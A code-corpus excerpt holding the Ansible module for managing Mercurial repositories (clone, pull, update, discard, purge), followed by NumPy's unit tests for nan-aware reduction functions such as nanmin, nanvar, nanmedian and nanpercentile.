# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import ConfigParser
DOCUMENTATION = '''
---
module: hg
short_description: Manages Mercurial (hg) repositories.
description:
- Manages Mercurial (hg) repositories. Supports SSH, HTTP/S and local address.
version_added: "1.0"
author: "Yeukhon Wong (@yeukhon)"
options:
repo:
description:
- The repository address.
required: true
default: null
aliases: [ name ]
dest:
description:
- Absolute path of where the repository should be cloned to.
required: true
default: null
revision:
description:
- Equivalent C(-r) option in hg command which could be the changeset, revision number,
branch name or even tag.
required: false
default: null
aliases: [ version ]
force:
description:
- Discards uncommitted changes. Runs C(hg update -C). Prior to
1.9, the default was `yes`.
required: false
default: "no"
choices: [ "yes", "no" ]
purge:
description:
- Deletes untracked files. Runs C(hg purge).
required: false
default: "no"
choices: [ "yes", "no" ]
update:
required: false
default: "yes"
choices: [ "yes", "no" ]
version_added: "2.0"
description:
- If C(no), do not retrieve new revisions from the origin repository
executable:
required: false
default: null
version_added: "1.4"
description:
- Path to hg executable to use. If not supplied,
the normal mechanism for resolving binary paths will be used.
notes:
- "If the task seems to be hanging, first verify remote host is in C(known_hosts).
SSH will prompt user to authorize the first contact with a remote host. To avoid this prompt,
one solution is to add the remote host public key in C(/etc/ssh/ssh_known_hosts) before calling
the hg module, with the following command: ssh-keyscan remote_host.com >> /etc/ssh/ssh_known_hosts."
requirements: [ ]
'''
EXAMPLES = '''
# Ensure the current working copy is inside the stable branch and deletes untracked files if any.
- hg: repo=https://bitbucket.org/user/repo1 dest=/home/user/repo1 revision=stable purge=yes
'''
class Hg(object):
    """Thin wrapper around the ``hg`` command line client.

    Every helper shells out through the AnsibleModule command runner and
    operates on the working copy located at ``dest``.
    """

    def __init__(self, module, dest, repo, revision, hg_path):
        self.module = module
        self.dest = dest
        self.repo = repo
        self.revision = revision
        self.hg_path = hg_path

    def _command(self, args_list):
        # Run ``hg <args>`` and hand back the (rc, stdout, stderr) triple.
        return self.module.run_command([self.hg_path] + args_list)

    def _list_untracked(self):
        # ``hg purge --print`` lists untracked files without deleting them;
        # the purge extension is enabled ad hoc via --config.
        return self._command(
            ['purge', '--config', 'extensions.purge=', '-R', self.dest,
             '--print'])

    def get_revision(self):
        """Return the working copy id as ``"<changeset>[+] <branch> <tag>"``.

        A trailing ``+`` on the changeset hash marks uncommitted local
        changes (see ``hg id --help`` for the full format).
        """
        rc, out, err = self._command(['id', '-b', '-i', '-t', '-R', self.dest])
        if rc != 0:
            self.module.fail_json(msg=err)
        return out.strip('\n')

    def has_local_mods(self):
        # The '+' suffix in ``hg id`` output flags uncommitted changes.
        return '+' in self.get_revision()

    def discard(self):
        """Throw away uncommitted changes via ``hg update -C``.

        Returns True when modifications were actually discarded, False when
        the working copy was already clean.
        """
        dirty_before = self.has_local_mods()
        if not dirty_before:
            return False
        cmd = ['update', '-C', '-R', self.dest]
        if self.revision is not None:
            cmd = cmd + ['-r', self.revision]
        rc, out, err = self._command(cmd)
        if rc != 0:
            self.module.fail_json(msg=err)
        if not self.has_local_mods():  # modifications really discarded
            return True

    def purge(self):
        """Delete untracked files with ``hg purge``; True if any were removed."""
        # Check for untracked files first so we only purge when needed.
        rc, out, err = self._list_untracked()
        if rc != 0:
            self.module.fail_json(msg=err)
        if out == '':
            # nothing untracked, nothing to do
            return False
        rc2, out2, err2 = self._command(
            ['purge', '--config', 'extensions.purge=', '-R', self.dest])
        if rc2 != 0:
            self.module.fail_json(msg=err2)
        return True

    def cleanup(self, force, purge):
        """Optionally discard and/or purge; True when anything changed."""
        discarded = self.discard() if force else False
        purged = self.purge() if purge else False
        return bool(discarded or purged)

    def pull(self):
        return self._command(['pull', '-R', self.dest, self.repo])

    def update(self):
        if self.revision is None:
            return self._command(['update', '-R', self.dest])
        return self._command(['update', '-r', self.revision, '-R', self.dest])

    def clone(self):
        cmd = ['clone', self.repo, self.dest]
        if self.revision is not None:
            cmd = cmd + ['-r', self.revision]
        return self._command(cmd)

    @property
    def at_revision(self):
        """True when the working copy already sits at ``self.revision``.

        Avoids pulling from a potentially slow or unreachable remote when
        the wanted changeset is already checked out.  Only meaningful for
        hash-like revisions (>= 7 chars); rev numbers, tags and branch
        names simply return False.
        """
        if self.revision is None or len(self.revision) < 7:
            # Assume it's a rev number, tag, or branch
            return False
        rc, out, err = self._command(['--debug', 'id', '-i', '-R', self.dest])
        if rc != 0:
            self.module.fail_json(msg=err)
        return out.startswith(self.revision)
# ===========================================
def main():
    """Entry point for the ``hg`` Ansible module.

    Clones the repository when no working copy exists at ``dest``;
    otherwise optionally discards/purges local changes, pulls and updates.
    Terminates through ``module.exit_json``/``module.fail_json``.
    """
    module = AnsibleModule(
        argument_spec = dict(
            repo = dict(required=True, aliases=['name']),
            dest = dict(required=True),
            revision = dict(default=None, aliases=['version']),
            force = dict(default='no', type='bool'),
            purge = dict(default='no', type='bool'),
            update = dict(default='yes', type='bool'),
            executable = dict(default=None),
        ),
    )
    repo = module.params['repo']
    dest = os.path.expanduser(module.params['dest'])
    revision = module.params['revision']
    force = module.params['force']
    purge = module.params['purge']
    update = module.params['update']
    # Fall back to PATH lookup when no explicit hg executable is given.
    hg_path = module.params['executable'] or module.get_bin_path('hg', True)
    # Presence of .hg/hgrc is used as the marker for an existing clone.
    hgrc = os.path.join(dest, '.hg/hgrc')

    # initial states
    before = ''
    changed = False
    cleaned = False

    hg = Hg(module, dest, repo, revision, hg_path)

    # If there is no hgrc file, then assume repo is absent
    # and perform clone. Otherwise, perform pull and update.
    if not os.path.exists(hgrc):
        (rc, out, err) = hg.clone()
        if rc != 0:
            module.fail_json(msg=err)
    elif not update:
        # Just return having found a repo already in the dest path
        before = hg.get_revision()
    elif hg.at_revision:
        # no update needed, don't pull
        before = hg.get_revision()

        # but force and purge if desired
        cleaned = hg.cleanup(force, purge)
    else:
        # get the current state before doing pulling
        before = hg.get_revision()

        # can perform force and purge
        cleaned = hg.cleanup(force, purge)

        (rc, out, err) = hg.pull()
        if rc != 0:
            module.fail_json(msg=err)

        (rc, out, err) = hg.update()
        if rc != 0:
            module.fail_json(msg=err)

    # Report "changed" when the revision moved or a cleanup happened.
    after = hg.get_revision()
    if before != after or cleaned:
        changed = True
    module.exit_json(before=before, after=after, changed=changed, cleaned=cleaned)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
pyparallel/numpy | numpy/lib/tests/test_nanfunctions.py | 85 | 26868 | from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
from numpy.testing import (
run_module_suite, TestCase, assert_, assert_equal, assert_almost_equal,
assert_raises, assert_array_equal
)
# Test data: a 4x6 float array with NaNs scattered through it, used as the
# shared fixture for most tests in this module.
_ndat = np.array([[0.6244, np.nan, 0.2692, 0.0116, np.nan, 0.1170],
                  [0.5351, -0.9403, np.nan, 0.2100, 0.4759, 0.2833],
                  [np.nan, np.nan, np.nan, 0.1042, np.nan, -0.5954],
                  [0.1610, np.nan, np.nan, 0.1859, 0.3146, np.nan]])

# Rows of _ndat with nans removed; reference values for axis=1 reductions.
_rdat = [np.array([0.6244, 0.2692, 0.0116, 0.1170]),
         np.array([0.5351, -0.9403, 0.2100, 0.4759, 0.2833]),
         np.array([0.1042, -0.5954]),
         np.array([0.1610, 0.1859, 0.3146])]
class TestNanFunctions_MinMax(TestCase):
nanfuncs = [np.nanmin, np.nanmax]
stdfuncs = [np.min, np.max]
def test_mutation(self):
# Check that passed array is not modified.
ndat = _ndat.copy()
for f in self.nanfuncs:
f(ndat)
assert_equal(ndat, _ndat)
def test_keepdims(self):
mat = np.eye(3)
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
for axis in [None, 0, 1]:
tgt = rf(mat, axis=axis, keepdims=True)
res = nf(mat, axis=axis, keepdims=True)
assert_(res.ndim == tgt.ndim)
def test_out(self):
mat = np.eye(3)
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
resout = np.zeros(3)
tgt = rf(mat, axis=1)
res = nf(mat, axis=1, out=resout)
assert_almost_equal(res, resout)
assert_almost_equal(res, tgt)
def test_dtype_from_input(self):
codes = 'efdgFDG'
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
for c in codes:
mat = np.eye(3, dtype=c)
tgt = rf(mat, axis=1).dtype.type
res = nf(mat, axis=1).dtype.type
assert_(res is tgt)
# scalar case
tgt = rf(mat, axis=None).dtype.type
res = nf(mat, axis=None).dtype.type
assert_(res is tgt)
def test_result_values(self):
for nf, rf in zip(self.nanfuncs, self.stdfuncs):
tgt = [rf(d) for d in _rdat]
res = nf(_ndat, axis=1)
assert_almost_equal(res, tgt)
def test_allnans(self):
mat = np.array([np.nan]*9).reshape(3, 3)
for f in self.nanfuncs:
for axis in [None, 0, 1]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_(np.isnan(f(mat, axis=axis)).all())
assert_(len(w) == 1, 'no warning raised')
assert_(issubclass(w[0].category, RuntimeWarning))
# Check scalars
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
assert_(np.isnan(f(np.nan)))
assert_(len(w) == 1, 'no warning raised')
assert_(issubclass(w[0].category, RuntimeWarning))
def test_masked(self):
mat = np.ma.fix_invalid(_ndat)
msk = mat._mask.copy()
for f in [np.nanmin]:
res = f(mat, axis=1)
tgt = f(_ndat, axis=1)
assert_equal(res, tgt)
assert_equal(mat._mask, msk)
assert_(not np.isinf(mat).any())
def test_scalar(self):
for f in self.nanfuncs:
assert_(f(0.) == 0.)
def test_matrices(self):
# Check that it works and that type and
# shape are preserved
mat = np.matrix(np.eye(3))
for f in self.nanfuncs:
res = f(mat, axis=0)
assert_(isinstance(res, np.matrix))
assert_(res.shape == (1, 3))
res = f(mat, axis=1)
assert_(isinstance(res, np.matrix))
assert_(res.shape == (3, 1))
res = f(mat)
assert_(np.isscalar(res))
# check that rows of nan are dealt with for subclasses (#4628)
mat[1] = np.nan
for f in self.nanfuncs:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
res = f(mat, axis=0)
assert_(isinstance(res, np.matrix))
assert_(not np.any(np.isnan(res)))
assert_(len(w) == 0)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
res = f(mat, axis=1)
assert_(isinstance(res, np.matrix))
assert_(np.isnan(res[1, 0]) and not np.isnan(res[0, 0])
and not np.isnan(res[2, 0]))
assert_(len(w) == 1, 'no warning raised')
assert_(issubclass(w[0].category, RuntimeWarning))
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
res = f(mat)
assert_(np.isscalar(res))
assert_(res != np.nan)
assert_(len(w) == 0)
class TestNanFunctions_ArgminArgmax(TestCase):
nanfuncs = [np.nanargmin, np.nanargmax]
def test_mutation(self):
# Check that passed array is not modified.
ndat = _ndat.copy()
for f in self.nanfuncs:
f(ndat)
assert_equal(ndat, _ndat)
def test_result_values(self):
for f, fcmp in zip(self.nanfuncs, [np.greater, np.less]):
for row in _ndat:
with warnings.catch_warnings(record=True):
warnings.simplefilter('always')
ind = f(row)
val = row[ind]
# comparing with NaN is tricky as the result
# is always false except for NaN != NaN
assert_(not np.isnan(val))
assert_(not fcmp(val, row).any())
assert_(not np.equal(val, row[:ind]).any())
def test_allnans(self):
mat = np.array([np.nan]*9).reshape(3, 3)
for f in self.nanfuncs:
for axis in [None, 0, 1]:
assert_raises(ValueError, f, mat, axis=axis)
assert_raises(ValueError, f, np.nan)
def test_empty(self):
mat = np.zeros((0, 3))
for f in self.nanfuncs:
for axis in [0, None]:
assert_raises(ValueError, f, mat, axis=axis)
for axis in [1]:
res = f(mat, axis=axis)
assert_equal(res, np.zeros(0))
def test_scalar(self):
for f in self.nanfuncs:
assert_(f(0.) == 0.)
def test_matrices(self):
# Check that it works and that type and
# shape are preserved
mat = np.matrix(np.eye(3))
for f in self.nanfuncs:
res = f(mat, axis=0)
assert_(isinstance(res, np.matrix))
assert_(res.shape == (1, 3))
res = f(mat, axis=1)
assert_(isinstance(res, np.matrix))
assert_(res.shape == (3, 1))
res = f(mat)
assert_(np.isscalar(res))
class TestNanFunctions_IntTypes(TestCase):
    """Integer input contains no NaNs, so every nan-function must agree
    exactly with its plain counterpart for all integer dtypes."""

    int_types = (np.int8, np.int16, np.int32, np.int64, np.uint8,
                 np.uint16, np.uint32, np.uint64)

    # Values fit in int8 so every dtype in int_types can represent them.
    mat = np.array([127, 39, 93, 87, 46])

    def integer_arrays(self):
        # Yield self.mat cast to every supported integer dtype.
        for dtype in self.int_types:
            yield self.mat.astype(dtype)

    def test_nanmin(self):
        tgt = np.min(self.mat)
        for mat in self.integer_arrays():
            assert_equal(np.nanmin(mat), tgt)

    def test_nanmax(self):
        tgt = np.max(self.mat)
        for mat in self.integer_arrays():
            assert_equal(np.nanmax(mat), tgt)

    def test_nanargmin(self):
        tgt = np.argmin(self.mat)
        for mat in self.integer_arrays():
            assert_equal(np.nanargmin(mat), tgt)

    def test_nanargmax(self):
        tgt = np.argmax(self.mat)
        for mat in self.integer_arrays():
            assert_equal(np.nanargmax(mat), tgt)

    def test_nansum(self):
        tgt = np.sum(self.mat)
        for mat in self.integer_arrays():
            assert_equal(np.nansum(mat), tgt)

    def test_nanprod(self):
        tgt = np.prod(self.mat)
        for mat in self.integer_arrays():
            assert_equal(np.nanprod(mat), tgt)

    def test_nanmean(self):
        tgt = np.mean(self.mat)
        for mat in self.integer_arrays():
            assert_equal(np.nanmean(mat), tgt)

    def test_nanvar(self):
        tgt = np.var(self.mat)
        for mat in self.integer_arrays():
            assert_equal(np.nanvar(mat), tgt)

        # BUG FIX: the reference value must be computed from self.mat, not
        # from the stale loop variable ``mat`` left over from the previous
        # loop (compare test_nanstd below, which already used self.mat).
        tgt = np.var(self.mat, ddof=1)
        for mat in self.integer_arrays():
            assert_equal(np.nanvar(mat, ddof=1), tgt)

    def test_nanstd(self):
        tgt = np.std(self.mat)
        for mat in self.integer_arrays():
            assert_equal(np.nanstd(mat), tgt)

        tgt = np.std(self.mat, ddof=1)
        for mat in self.integer_arrays():
            assert_equal(np.nanstd(mat, ddof=1), tgt)
class SharedNanFunctionsTestsMixin(object):
    """Tests shared by the nansum/nanprod and nanmean/nanvar/nanstd cases.

    Subclasses supply matching ``nanfuncs``/``stdfuncs`` lists; each test
    checks a nan-function against its plain counterpart.
    """

    def test_mutation(self):
        # Check that passed array is not modified.
        ndat = _ndat.copy()
        for f in self.nanfuncs:
            f(ndat)
        assert_equal(ndat, _ndat)

    def test_keepdims(self):
        # keepdims=True must preserve the number of dimensions.
        mat = np.eye(3)
        for nf, rf in zip(self.nanfuncs, self.stdfuncs):
            for axis in [None, 0, 1]:
                tgt = rf(mat, axis=axis, keepdims=True)
                res = nf(mat, axis=axis, keepdims=True)
                assert_(res.ndim == tgt.ndim)

    def test_out(self):
        # The out= argument must receive the same values as the return.
        mat = np.eye(3)
        for nf, rf in zip(self.nanfuncs, self.stdfuncs):
            resout = np.zeros(3)
            tgt = rf(mat, axis=1)
            res = nf(mat, axis=1, out=resout)
            assert_almost_equal(res, resout)
            assert_almost_equal(res, tgt)

    def test_dtype_from_dtype(self):
        mat = np.eye(3)
        # 'efdgFDG': the inexact (float and complex) dtype characters.
        codes = 'efdgFDG'
        for nf, rf in zip(self.nanfuncs, self.stdfuncs):
            for c in codes:
                tgt = rf(mat, dtype=np.dtype(c), axis=1).dtype.type
                res = nf(mat, dtype=np.dtype(c), axis=1).dtype.type
                assert_(res is tgt)
                # scalar case
                tgt = rf(mat, dtype=np.dtype(c), axis=None).dtype.type
                res = nf(mat, dtype=np.dtype(c), axis=None).dtype.type
                assert_(res is tgt)

    def test_dtype_from_char(self):
        # Same as test_dtype_from_dtype but passing the dtype character.
        mat = np.eye(3)
        codes = 'efdgFDG'
        for nf, rf in zip(self.nanfuncs, self.stdfuncs):
            for c in codes:
                tgt = rf(mat, dtype=c, axis=1).dtype.type
                res = nf(mat, dtype=c, axis=1).dtype.type
                assert_(res is tgt)
                # scalar case
                tgt = rf(mat, dtype=c, axis=None).dtype.type
                res = nf(mat, dtype=c, axis=None).dtype.type
                assert_(res is tgt)

    def test_dtype_from_input(self):
        # Result dtype must follow the input dtype when none is given.
        codes = 'efdgFDG'
        for nf, rf in zip(self.nanfuncs, self.stdfuncs):
            for c in codes:
                mat = np.eye(3, dtype=c)
                tgt = rf(mat, axis=1).dtype.type
                res = nf(mat, axis=1).dtype.type
                assert_(res is tgt, "res %s, tgt %s" % (res, tgt))
                # scalar case
                tgt = rf(mat, axis=None).dtype.type
                res = nf(mat, axis=None).dtype.type
                assert_(res is tgt)

    def test_result_values(self):
        # Results must agree with the plain function over nan-free rows.
        for nf, rf in zip(self.nanfuncs, self.stdfuncs):
            tgt = [rf(d) for d in _rdat]
            res = nf(_ndat, axis=1)
            assert_almost_equal(res, tgt)

    def test_scalar(self):
        for f in self.nanfuncs:
            assert_(f(0.) == 0.)

    def test_matrices(self):
        # Check that it works and that type and
        # shape are preserved
        mat = np.matrix(np.eye(3))
        for f in self.nanfuncs:
            res = f(mat, axis=0)
            assert_(isinstance(res, np.matrix))
            assert_(res.shape == (1, 3))
            res = f(mat, axis=1)
            assert_(isinstance(res, np.matrix))
            assert_(res.shape == (3, 1))
            res = f(mat)
            assert_(np.isscalar(res))
class TestNanFunctions_SumProd(TestCase, SharedNanFunctionsTestsMixin):
    """Tests specific to np.nansum and np.nanprod."""

    nanfuncs = [np.nansum, np.nanprod]
    stdfuncs = [np.sum, np.prod]

    def test_allnans(self):
        # Check for FutureWarning
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter('always')
            res = np.nansum([np.nan]*3, axis=None)
            assert_(res == 0, 'result is not 0')
            assert_(len(w) == 0, 'warning raised')
            # Check scalar
            res = np.nansum(np.nan)
            assert_(res == 0, 'result is not 0')
            assert_(len(w) == 0, 'warning raised')
            # Check there is no warning for not all-nan
            np.nansum([0]*3, axis=None)
            assert_(len(w) == 0, 'unwanted warning raised')

    def test_empty(self):
        # Empty reductions return the operation identity
        # (0 for nansum, 1 for nanprod).
        for f, tgt_value in zip([np.nansum, np.nanprod], [0, 1]):
            mat = np.zeros((0, 3))
            tgt = [tgt_value]*3
            res = f(mat, axis=0)
            assert_equal(res, tgt)
            tgt = []
            res = f(mat, axis=1)
            assert_equal(res, tgt)
            tgt = tgt_value
            res = f(mat, axis=None)
            assert_equal(res, tgt)
class TestNanFunctions_MeanVarStd(TestCase, SharedNanFunctionsTestsMixin):
    """Tests specific to np.nanmean, np.nanvar and np.nanstd."""

    nanfuncs = [np.nanmean, np.nanvar, np.nanstd]
    stdfuncs = [np.mean, np.var, np.std]

    def test_dtype_error(self):
        # These functions only accept inexact dtypes and must raise
        # TypeError otherwise.
        # BUG FIX: the loop variable ``dtype`` was never used -- the
        # original passed ``dtype=np.int`` on every iteration, so the bool
        # and object cases were never exercised.
        for f in self.nanfuncs:
            for dtype in [np.bool_, np.int_, np.object]:
                assert_raises(TypeError, f, _ndat, axis=1, dtype=dtype)

    def test_out_dtype_error(self):
        # A non-inexact out= array must likewise raise TypeError.
        for f in self.nanfuncs:
            for dtype in [np.bool_, np.int_, np.object]:
                out = np.empty(_ndat.shape[0], dtype=dtype)
                assert_raises(TypeError, f, _ndat, axis=1, out=out)

    def test_ddof(self):
        # ddof must be forwarded and match var/std on nan-free rows.
        nanfuncs = [np.nanvar, np.nanstd]
        stdfuncs = [np.var, np.std]
        for nf, rf in zip(nanfuncs, stdfuncs):
            for ddof in [0, 1]:
                tgt = [rf(d, ddof=ddof) for d in _rdat]
                res = nf(_ndat, axis=1, ddof=ddof)
                assert_almost_equal(res, tgt)

    def test_ddof_too_big(self):
        # ddof >= number of valid samples must yield NaN and exactly one
        # RuntimeWarning.
        nanfuncs = [np.nanvar, np.nanstd]
        stdfuncs = [np.var, np.std]
        dsize = [len(d) for d in _rdat]
        for nf, rf in zip(nanfuncs, stdfuncs):
            for ddof in range(5):
                with warnings.catch_warnings(record=True) as w:
                    warnings.simplefilter('always')
                    tgt = [ddof >= d for d in dsize]
                    res = nf(_ndat, axis=1, ddof=ddof)
                    assert_equal(np.isnan(res), tgt)
                    if any(tgt):
                        assert_(len(w) == 1)
                        assert_(issubclass(w[0].category, RuntimeWarning))
                    else:
                        assert_(len(w) == 0)

    def test_allnans(self):
        # All-NaN slices produce NaN plus a RuntimeWarning per call.
        mat = np.array([np.nan]*9).reshape(3, 3)
        for f in self.nanfuncs:
            for axis in [None, 0, 1]:
                with warnings.catch_warnings(record=True) as w:
                    warnings.simplefilter('always')
                    assert_(np.isnan(f(mat, axis=axis)).all())
                    assert_(len(w) == 1)
                    assert_(issubclass(w[0].category, RuntimeWarning))
                    # Check scalar
                    assert_(np.isnan(f(np.nan)))
                    assert_(len(w) == 2)
                    assert_(issubclass(w[0].category, RuntimeWarning))

    def test_empty(self):
        mat = np.zeros((0, 3))
        for f in self.nanfuncs:
            for axis in [0, None]:
                # Empty reductions over these axes warn and give NaN.
                with warnings.catch_warnings(record=True) as w:
                    warnings.simplefilter('always')
                    assert_(np.isnan(f(mat, axis=axis)).all())
                    assert_(len(w) == 1)
                    assert_(issubclass(w[0].category, RuntimeWarning))
            for axis in [1]:
                # Reducing the non-empty axis of a (0, 3) array is fine.
                with warnings.catch_warnings(record=True) as w:
                    warnings.simplefilter('always')
                    assert_equal(f(mat, axis=axis), np.zeros([]))
                    assert_(len(w) == 0)
class TestNanFunctions_Median(TestCase):
    """Tests for np.nanmedian."""

    def test_mutation(self):
        # Check that passed array is not modified.
        ndat = _ndat.copy()
        np.nanmedian(ndat)
        assert_equal(ndat, _ndat)

    def test_keepdims(self):
        # keepdims=True must preserve dimensionality and reduce the
        # requested axes to length 1.
        mat = np.eye(3)
        for axis in [None, 0, 1]:
            tgt = np.median(mat, axis=axis, out=None, overwrite_input=False)
            res = np.nanmedian(mat, axis=axis, out=None, overwrite_input=False)
            assert_(res.ndim == tgt.ndim)

        d = np.ones((3, 5, 7, 11))
        # Randomly set some elements to NaN:
        w = np.random.random((4, 200)) * np.array(d.shape)[:, None]
        w = w.astype(np.intp)
        d[tuple(w)] = np.nan
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter('always', RuntimeWarning)
            res = np.nanmedian(d, axis=None, keepdims=True)
            assert_equal(res.shape, (1, 1, 1, 1))
            res = np.nanmedian(d, axis=(0, 1), keepdims=True)
            assert_equal(res.shape, (1, 1, 7, 11))
            res = np.nanmedian(d, axis=(0, 3), keepdims=True)
            assert_equal(res.shape, (1, 5, 7, 1))
            res = np.nanmedian(d, axis=(1,), keepdims=True)
            assert_equal(res.shape, (3, 1, 7, 11))
            res = np.nanmedian(d, axis=(0, 1, 2, 3), keepdims=True)
            assert_equal(res.shape, (1, 1, 1, 1))
            res = np.nanmedian(d, axis=(0, 1, 3), keepdims=True)
            assert_equal(res.shape, (1, 1, 7, 1))

    def test_out(self):
        # The out= argument must receive the same values as the return.
        mat = np.random.rand(3, 3)
        nan_mat = np.insert(mat, [0, 2], np.nan, axis=1)
        resout = np.zeros(3)
        tgt = np.median(mat, axis=1)
        res = np.nanmedian(nan_mat, axis=1, out=resout)
        assert_almost_equal(res, resout)
        assert_almost_equal(res, tgt)
        # 0-d output:
        resout = np.zeros(())
        tgt = np.median(mat, axis=None)
        res = np.nanmedian(nan_mat, axis=None, out=resout)
        assert_almost_equal(res, resout)
        assert_almost_equal(res, tgt)
        res = np.nanmedian(nan_mat, axis=(0, 1), out=resout)
        assert_almost_equal(res, resout)
        assert_almost_equal(res, tgt)

    def test_small_large(self):
        # test the small and large code paths, current cutoff 400 elements
        for s in [5, 20, 51, 200, 1000]:
            d = np.random.randn(4, s)
            # Randomly set some elements to NaN:
            w = np.random.randint(0, d.size, size=d.size // 5)
            d.ravel()[w] = np.nan
            d[:,0] = 1.  # ensure at least one good value
            # use normal median without nans to compare
            tgt = []
            for x in d:
                nonan = np.compress(~np.isnan(x), x)
                tgt.append(np.median(nonan, overwrite_input=True))

            assert_array_equal(np.nanmedian(d, axis=-1), tgt)

    def test_result_values(self):
        # Results must agree with np.median over the nan-free rows.
        tgt = [np.median(d) for d in _rdat]
        res = np.nanmedian(_ndat, axis=1)
        assert_almost_equal(res, tgt)

    def test_allnans(self):
        # All-NaN input yields NaN; the exact warning count depends on the
        # reduction axis (one warning per all-NaN slice plus the scalar call).
        mat = np.array([np.nan]*9).reshape(3, 3)
        for axis in [None, 0, 1]:
            with warnings.catch_warnings(record=True) as w:
                warnings.simplefilter('always')
                assert_(np.isnan(np.nanmedian(mat, axis=axis)).all())
                if axis is None:
                    assert_(len(w) == 1)
                else:
                    assert_(len(w) == 3)
                assert_(issubclass(w[0].category, RuntimeWarning))
                # Check scalar
                assert_(np.isnan(np.nanmedian(np.nan)))
                if axis is None:
                    assert_(len(w) == 2)
                else:
                    assert_(len(w) == 4)
                assert_(issubclass(w[0].category, RuntimeWarning))

    def test_empty(self):
        mat = np.zeros((0, 3))
        for axis in [0, None]:
            with warnings.catch_warnings(record=True) as w:
                warnings.simplefilter('always')
                assert_(np.isnan(np.nanmedian(mat, axis=axis)).all())
                assert_(len(w) == 1)
                assert_(issubclass(w[0].category, RuntimeWarning))
        for axis in [1]:
            with warnings.catch_warnings(record=True) as w:
                warnings.simplefilter('always')
                assert_equal(np.nanmedian(mat, axis=axis), np.zeros([]))
                assert_(len(w) == 0)

    def test_scalar(self):
        assert_(np.nanmedian(0.) == 0.)

    def test_extended_axis_invalid(self):
        # Out-of-range or duplicated axes must raise.
        d = np.ones((3, 5, 7, 11))
        assert_raises(IndexError, np.nanmedian, d, axis=-5)
        assert_raises(IndexError, np.nanmedian, d, axis=(0, -5))
        assert_raises(IndexError, np.nanmedian, d, axis=4)
        assert_raises(IndexError, np.nanmedian, d, axis=(0, 4))
        assert_raises(ValueError, np.nanmedian, d, axis=(1, 1))

    def test_float_special(self):
        # inf values must survive the internal NaN masking.
        with warnings.catch_warnings(record=True):
            warnings.simplefilter('ignore', RuntimeWarning)
            a = np.array([[np.inf, np.nan], [np.nan, np.nan]])
            assert_equal(np.nanmedian(a, axis=0), [np.inf, np.nan])
            assert_equal(np.nanmedian(a, axis=1), [np.inf, np.nan])
            assert_equal(np.nanmedian(a), np.inf)

            # minimum fill value check
            a = np.array([[np.nan, np.nan, np.inf], [np.nan, np.nan, np.inf]])
            assert_equal(np.nanmedian(a, axis=1), np.inf)

            # no mask path
            a = np.array([[np.inf, np.inf], [np.inf, np.inf]])
            assert_equal(np.nanmedian(a, axis=1), np.inf)
class TestNanFunctions_Percentile(TestCase):
    """Tests for np.nanpercentile."""

    def test_mutation(self):
        # Check that passed array is not modified.
        ndat = _ndat.copy()
        np.nanpercentile(ndat, 30)
        assert_equal(ndat, _ndat)

    def test_keepdims(self):
        # keepdims=True must preserve dimensionality and reduce the
        # requested axes to length 1.
        mat = np.eye(3)
        for axis in [None, 0, 1]:
            tgt = np.percentile(mat, 70, axis=axis, out=None,
                                overwrite_input=False)
            res = np.nanpercentile(mat, 70, axis=axis, out=None,
                                   overwrite_input=False)
            assert_(res.ndim == tgt.ndim)

        d = np.ones((3, 5, 7, 11))
        # Randomly set some elements to NaN:
        w = np.random.random((4, 200)) * np.array(d.shape)[:, None]
        w = w.astype(np.intp)
        d[tuple(w)] = np.nan
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter('always', RuntimeWarning)
            res = np.nanpercentile(d, 90, axis=None, keepdims=True)
            assert_equal(res.shape, (1, 1, 1, 1))
            res = np.nanpercentile(d, 90, axis=(0, 1), keepdims=True)
            assert_equal(res.shape, (1, 1, 7, 11))
            res = np.nanpercentile(d, 90, axis=(0, 3), keepdims=True)
            assert_equal(res.shape, (1, 5, 7, 1))
            res = np.nanpercentile(d, 90, axis=(1,), keepdims=True)
            assert_equal(res.shape, (3, 1, 7, 11))
            res = np.nanpercentile(d, 90, axis=(0, 1, 2, 3), keepdims=True)
            assert_equal(res.shape, (1, 1, 1, 1))
            res = np.nanpercentile(d, 90, axis=(0, 1, 3), keepdims=True)
            assert_equal(res.shape, (1, 1, 7, 1))

    def test_out(self):
        # The out= argument must receive the same values as the return.
        mat = np.random.rand(3, 3)
        nan_mat = np.insert(mat, [0, 2], np.nan, axis=1)
        resout = np.zeros(3)
        tgt = np.percentile(mat, 42, axis=1)
        res = np.nanpercentile(nan_mat, 42, axis=1, out=resout)
        assert_almost_equal(res, resout)
        assert_almost_equal(res, tgt)
        # 0-d output:
        resout = np.zeros(())
        tgt = np.percentile(mat, 42, axis=None)
        res = np.nanpercentile(nan_mat, 42, axis=None, out=resout)
        assert_almost_equal(res, resout)
        assert_almost_equal(res, tgt)
        res = np.nanpercentile(nan_mat, 42, axis=(0, 1), out=resout)
        assert_almost_equal(res, resout)
        assert_almost_equal(res, tgt)

    def test_result_values(self):
        # Results must agree with np.percentile over the nan-free rows,
        # for both scalar and sequence q.
        tgt = [np.percentile(d, 28) for d in _rdat]
        res = np.nanpercentile(_ndat, 28, axis=1)
        assert_almost_equal(res, tgt)
        tgt = [np.percentile(d, (28, 98)) for d in _rdat]
        res = np.nanpercentile(_ndat, (28, 98), axis=1)
        assert_almost_equal(res, tgt)

    def test_allnans(self):
        # All-NaN input yields NaN; the exact warning count depends on the
        # reduction axis (one warning per all-NaN slice plus the scalar call).
        mat = np.array([np.nan]*9).reshape(3, 3)
        for axis in [None, 0, 1]:
            with warnings.catch_warnings(record=True) as w:
                warnings.simplefilter('always')
                assert_(np.isnan(np.nanpercentile(mat, 60, axis=axis)).all())
                if axis is None:
                    assert_(len(w) == 1)
                else:
                    assert_(len(w) == 3)
                assert_(issubclass(w[0].category, RuntimeWarning))
                # Check scalar
                assert_(np.isnan(np.nanpercentile(np.nan, 60)))
                if axis is None:
                    assert_(len(w) == 2)
                else:
                    assert_(len(w) == 4)
